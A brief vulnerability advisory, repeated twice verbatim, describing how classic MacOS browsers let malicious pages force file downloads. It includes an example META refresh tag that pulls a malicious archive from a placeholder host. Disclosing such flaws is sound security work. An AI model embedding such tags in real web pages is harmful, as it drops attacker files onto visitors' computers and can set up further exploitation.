Various browsers for MacOS and MacOS X in Classic Mode allow malicious web pages to automatically download arbitrary files to the vulnerable user's computer. This can be accomplished through the use of a META refresh tag similar to the following: <META HTTP-EQUIV="refresh" CONTENT="1;URL=http://foo.com/malicious.sit"> The ability to place arbitrary files in a known location such as the default download directory may aid in the exploitation of BID 3935, "Apple MacOS Internet Explorer File Execution Vulnerability".
Various browsers for MacOS and MacOS X in Classic Mode allow malicious web pages to automatically download arbitrary files to the vulnerable user's computer. This can be accomplished through the use of a META refresh tag similar to the following: <META HTTP-EQUIV="refresh" CONTENT="1;URL=http://foo.com/malicious.sit"> The ability to place arbitrary files in a known location such as the default download directory may aid in the exploitation of BID 3935, "Apple MacOS Internet Explorer File Execution Vulnerability".